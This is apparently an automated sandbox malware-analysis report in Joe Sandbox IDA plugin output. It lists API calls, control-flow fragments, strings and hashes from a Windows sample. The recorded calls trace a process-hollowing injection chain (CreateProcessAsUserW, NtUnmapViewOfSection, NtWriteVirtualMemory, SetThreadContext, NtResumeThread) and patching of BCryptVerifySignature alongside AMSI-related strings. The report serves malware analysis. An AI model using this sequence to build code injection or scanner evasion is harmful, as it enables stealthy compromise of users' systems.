call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 SetThreadContext NtResumeThread call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d2cc8 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29efcd8 * 3 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29efcd8 * 4 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 4627->4701 4702 29f8dcc-29f8e19 call 29f7c54 call 29d737c 4627->4702 4628->4631 4703 29f8b44-29f8b49 4631->4703 4701->4231 4702->4701 4703->4563
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029EFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
                                                                                                                                              • Part of subcall function 029EFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
                                                                                                                                              • Part of subcall function 029EFD38: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
                                                                                                                                              • Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
                                                                                                                                              • Part of subcall function 029EFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
                                                                                                                                              • Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
                                                                                                                                              • Part of subcall function 029EFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
                                                                                                                                              • Part of subcall function 029EFD38: FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4
                                                                                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A6A408,02A6A3F8,OpenSession,02A6A3D0,029F9710,ScanString,02A6A3D0), ref: 029F82D9
                                                                                                                                            • GetThreadContext.KERNEL32(00000884,02A6A44C,ScanString,02A6A3D0,029F9710,UacInitialize,02A6A3D0,029F9710,ScanBuffer,02A6A3D0,029F9710,ScanBuffer,02A6A3D0,029F9710,OpenSession,02A6A3D0), ref: 029F85CE
                                                                                                                                            • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,0024CFF8,02A6A520,00000004,02A6A528,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0), ref: 029F882B
                                                                                                                                            • NtUnmapViewOfSection.N(0000088C,00400000,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,0000088C,0024CFF8,02A6A520,00000004,02A6A528), ref: 029F89A6
                                                                                                                                              • Part of subcall function 029EFB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 029EFB8D
                                                                                                                                              • Part of subcall function 029EFB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029EFB93
                                                                                                                                              • Part of subcall function 029EFB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029EFBB3
                                                                                                                                            • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00400000,00000000,17D31400,02A6A528,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,ScanBuffer,02A6A3D0), ref: 029F8F89
                                                                                                                                            • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,0024CFF8,02A6A524,00000004,02A6A528,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,0000088C,00400000), ref: 029F90FC
                                                                                                                                            • SetThreadContext.KERNEL32(00000884,02A6A44C,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,0000088C,0024CFF8,02A6A524,00000004,02A6A528), ref: 029F9272
                                                                                                                                            • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00000000,00000884,02A6A44C,ScanBuffer,02A6A3D0,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,0000088C,0024CFF8,02A6A524), ref: 029F927F
                                                                                                                                              • Part of subcall function 029EFCD8: LoadLibraryW.KERNEL32(bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0,029F9710,UacInitialize,02A6A3D0,029F9710,00000884,02A6A44C), ref: 029EFCEA
                                                                                                                                              • Part of subcall function 029EFCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029EFCF7
                                                                                                                                              • Part of subcall function 029EFCD8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan), ref: 029EFD0E
                                                                                                                                              • Part of subcall function 029EFCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0,029F9710,UacInitialize,02A6A3D0), ref: 029EFD1D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryVirtual$LibraryWrite$AddressProcProcessThread$ContextCurrentFreeHandleLoadModule$AllocateCreateProtectReadResumeSectionUnmapUserView
                                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                                                            • API String ID: 1232097254-1058128293
                                                                                                                                            • Opcode ID: 4c985ecf754abb6226392ebc4f668ef7d81bf9d367cba3b27203bfe65dd41e4a
                                                                                                                                            • Instruction ID: 89fc9a94fd6e46ed4638ceb44790de912732032fe68c7a436286580d621f5af6
                                                                                                                                            • Opcode Fuzzy Hash: 4c985ecf754abb6226392ebc4f668ef7d81bf9d367cba3b27203bfe65dd41e4a
                                                                                                                                            • Instruction Fuzzy Hash: 51D23235A012189BEB51EB64DD80BCE73BABFC5700F1198A1D109AB254DF30EE86DF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 4960 29d5ddc-29d5e1d GetModuleFileNameA RegOpenKeyExA 4961 29d5e5f-29d5ea2 call 29d5c18 RegQueryValueExA 4960->4961 4962 29d5e1f-29d5e3b RegOpenKeyExA 4960->4962 4967 29d5ea4-29d5ec0 RegQueryValueExA 4961->4967 4968 29d5ec6-29d5ee0 RegCloseKey 4961->4968 4962->4961 4963 29d5e3d-29d5e59 RegOpenKeyExA 4962->4963 4963->4961 4965 29d5ee8-29d5f19 lstrcpynA GetThreadLocale GetLocaleInfoA 4963->4965 4969 29d5f1f-29d5f23 4965->4969 4970 29d6002-29d6009 4965->4970 4967->4968 4974 29d5ec2 4967->4974 4972 29d5f2f-29d5f45 lstrlenA 4969->4972 4973 29d5f25-29d5f29 4969->4973 4975 29d5f48-29d5f4b 4972->4975 4973->4970 4973->4972 4974->4968 4976 29d5f4d-29d5f55 4975->4976 4977 29d5f57-29d5f5f 4975->4977 4976->4977 4978 29d5f47 4976->4978 4977->4970 4979 29d5f65-29d5f6a 4977->4979 4978->4975 4980 29d5f6c-29d5f92 lstrcpynA LoadLibraryExA 4979->4980 4981 29d5f94-29d5f96 4979->4981 4980->4981 4981->4970 4982 29d5f98-29d5f9c 4981->4982 4982->4970 4983 29d5f9e-29d5fce lstrcpynA LoadLibraryExA 4982->4983 4983->4970 4984 29d5fd0-29d6000 lstrcpynA LoadLibraryExA 4983->4984 4984->4970
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,029D0000,02A3A794), ref: 029D5DF8
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029D0000,02A3A794), ref: 029D5E16
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029D0000,02A3A794), ref: 029D5E34
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029D5E52
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029D5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029D5E9B
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,029D6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029D5EE1,?,80000001), ref: 029D5EB9
                                                                                                                                            • RegCloseKey.ADVAPI32(?,029D5EE8,00000000,?,?,00000000,029D5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029D5EDB
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029D5EF8
                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029D5F05
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029D5F0B
                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029D5F36
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029D5F7D
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029D5F8D
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029D5FB5
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029D5FC5
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029D5FEB
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029D5FFB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                            • API String ID: 1759228003-2375825460
                                                                                                                                            • Opcode ID: cce9e41a45df3847bcd1e6427380572975b6bb28ed3ac04032f3edac560d6b8b
                                                                                                                                            • Instruction ID: c19eeb80f32ad3868068d3388c382cf0f70701852ac01b1d11335a67777053cb
                                                                                                                                            • Opcode Fuzzy Hash: cce9e41a45df3847bcd1e6427380572975b6bb28ed3ac04032f3edac560d6b8b
                                                                                                                                            • Instruction Fuzzy Hash: FE519676A4024C7EFB21DAB4DC46FEF77AD9B44744F8080A1A704E61C1D7749A44DFA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
                                                                                                                                            • GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
                                                                                                                                            • GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
                                                                                                                                            • NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
                                                                                                                                            • GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
                                                                                                                                            • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
                                                                                                                                            • FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentLibraryMemoryProcessVirtual$AddressFreeHandleLoadModuleProcProtectWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1488642996-0
                                                                                                                                            • Opcode ID: e398107bb56124801a625c073cee10a8e63814e82ed7d59d24e065f38b7ee586
                                                                                                                                            • Instruction ID: 7fd81fb79024bcdf58eb7dbe96d49865f725ee0d03dade399f0b2780875e5606
                                                                                                                                            • Opcode Fuzzy Hash: e398107bb56124801a625c073cee10a8e63814e82ed7d59d24e065f38b7ee586
                                                                                                                                            • Instruction Fuzzy Hash: 62119374A40704BFEB00FBF8DC0AA5E77ADEB84700F548855B209F7692CB34A901AF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5282 29efcd8-29efcf3 LoadLibraryW 5283 29efcf5-29efcfe GetProcAddress 5282->5283 5284 29efd22-29efd2a 5282->5284 5285 29efd1c-29efd1d FreeLibrary 5283->5285 5286 29efd00-29efd18 NtWriteVirtualMemory 5283->5286 5285->5284 5286->5285 5287 29efd1a 5286->5287 5287->5285
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryW.KERNEL32(bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0,029F9710,UacInitialize,02A6A3D0,029F9710,00000884,02A6A44C), ref: 029EFCEA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029EFCF7
                                                                                                                                            • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan), ref: 029EFD0E
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,029F9710,ScanString,02A6A3D0,029F9710,Initialize,02A6A3D0,029F9710,UacScan,02A6A3D0,029F9710,UacInitialize,02A6A3D0), ref: 029EFD1D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                            • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                            • API String ID: 1002360270-4067648912
                                                                                                                                            • Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                                                            • Instruction ID: accb639bce01640864b0261797013b22af7750290ff917ea11a3776a0ba7323d
                                                                                                                                            • Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                                                            • Instruction Fuzzy Hash: 7AF0E2722092252EE621A1246C40EBF36ADCFC27A0F14872EB55886180DB618D4892B5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 029EFB8D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029EFB93
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029EFBB3
                                                                                                                                            Strings
                                                                                                                                            • C:\Windows\System32\ntdll.dll, xrefs: 029EFB88
                                                                                                                                            • NtAllocateVirtualMemory, xrefs: 029EFB83
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                            • API String ID: 421316089-2206134580
                                                                                                                                            • Opcode ID: 4b022835230fec858520c7553dd548821eb27ebd02eef610d95f3897acb23050
                                                                                                                                            • Instruction ID: 34da0294d16123aee8b335465e9c5c12a0268ac2a2c512bbc8ee1fa73ae2d552
                                                                                                                                            • Opcode Fuzzy Hash: 4b022835230fec858520c7553dd548821eb27ebd02eef610d95f3897acb23050
                                                                                                                                            • Instruction Fuzzy Hash: E8E01AB654020CBBDB00DF98D845EDB37ECAB88700F04840ABA1AD7101CB34E5108B61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029D5228: SysAllocStringLen.OLEAUT32(?,?), ref: 029D5236
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A2B838), ref: 02A2B7A3
                                                                                                                                            • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A2B838), ref: 02A2B7D3
                                                                                                                                            • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A2B7E8
                                                                                                                                            • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A2B814
                                                                                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A2B81D
                                                                                                                                              • Part of subcall function 029D4F68: SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1897104825-0
                                                                                                                                            • Opcode ID: 53960a303edc98a2281f06c672a7a3471d7ee04ea182a5e3b711092a63fce97e
                                                                                                                                            • Instruction ID: 0d095f1a92bcd66ff64daf296dab8eb365d93d97207aa10d4d862b786b7be696
                                                                                                                                            • Opcode Fuzzy Hash: 53960a303edc98a2281f06c672a7a3471d7ee04ea182a5e3b711092a63fce97e
                                                                                                                                            • Instruction Fuzzy Hash: 8521CF71A40218BBEB51EBE4CC42FDEB7BDAB48704F514561F701F71C0DAB4AA059BA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A2BC76
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CheckConnectionInternet
                                                                                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                            • API String ID: 3847983778-3852638603
                                                                                                                                            • Opcode ID: 2220033583708748a70e66e03d8272f22f8ca1f20454b88001d9ca773bf2d22e
                                                                                                                                            • Instruction ID: 1f9b28ad7873800d212d8dfc66278ee13706e6e2a540ad3cbee070eab4f72536
                                                                                                                                            • Opcode Fuzzy Hash: 2220033583708748a70e66e03d8272f22f8ca1f20454b88001d9ca773bf2d22e
                                                                                                                                            • Instruction Fuzzy Hash: 87415231B00118ABDB01EBA8C941FDEB3FAFF98704F219825E441A7250DE34ED069F60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029D5228: SysAllocStringLen.OLEAUT32(?,?), ref: 029D5236
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A2B756), ref: 02A2B6C3
                                                                                                                                            • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A2B6FD
                                                                                                                                            • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A2B72A
                                                                                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A2B733
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3764614163-0
                                                                                                                                            • Opcode ID: 101d09334be38dc5e772f645ee8a1beca5e3e0ed3cfa3c986fb648859428258e
                                                                                                                                            • Instruction ID: f8dc2a4eb36354a5ebb752a655c8d5954339c26af7326afd5d12c1070438f802
                                                                                                                                            • Opcode Fuzzy Hash: 101d09334be38dc5e772f645ee8a1beca5e3e0ed3cfa3c986fb648859428258e
                                                                                                                                            • Instruction Fuzzy Hash: C621C171A41218BAEB50EBE4CD42FDEB7BDAF44B04F614461B600FB1D0DBB4AB049B65
                                                                                                                                            Uniqueness

